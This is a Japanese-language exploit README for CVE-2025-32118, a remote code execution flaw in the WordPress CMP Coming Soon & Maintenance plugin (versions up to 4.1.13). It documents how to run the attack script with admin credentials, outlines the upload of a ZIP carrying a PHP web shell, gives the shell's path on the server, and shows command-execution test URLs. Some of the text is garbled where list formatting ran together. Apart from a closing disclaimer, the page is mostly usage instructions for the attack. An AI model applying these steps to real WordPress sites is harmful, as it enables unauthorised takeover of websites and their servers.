
WordPress CMP – Coming Soon & Maintenance プラグイン <= 4.1.13 - リモートコード実行 (RCE) の脆弱性
🔍 タイトル: WordPress CMP – Coming Soon & Maintenance プラグイン <= 4.1.13 - リモートコード実行 (RCE)
🗓️ 公開日: 2025-04-04
🔐 CWE: CWE-434 - 危険なタイプのファイルの無制限アップロード
📊 CVSS: 9.1 (緊急) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
WordPress 用の CMP – Coming Soon & Maintenance プラグイン (<= 4.1.13) に、重大な リモートコード実行 (RCE) の脆弱性が存在します。
この欠陥により、認証済み管理者ユーザー が実行可能な PHP シェルを含む悪意のある ZIP ファイルをアップロードでき、サイト全体の完全な侵害 につながります。
<= 4.1.13)python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Admin username
-p, --password PASSWORD Admin password
| Flag | 説明 |
|---|---|
-u | WordPress サイトのベース URL |
-un | ユーザー名 |
-p | パスワード |
nonce を取得します。style.css (有効なテーマ形式)nxploitedshell.php (RCE ペイロード)?cmd=whoami を実行してシェルを確認します。アップロードが成功すると、シェルは次の場所に配置されます:
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php
次のようにテストします:
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id
このエクスプロイトは教育目的のみを対象としています。
あなたが所有していないシステムに対するこのコードの無断使用は違法かつ非倫理的です。
Nxploited | Khaled Alenazi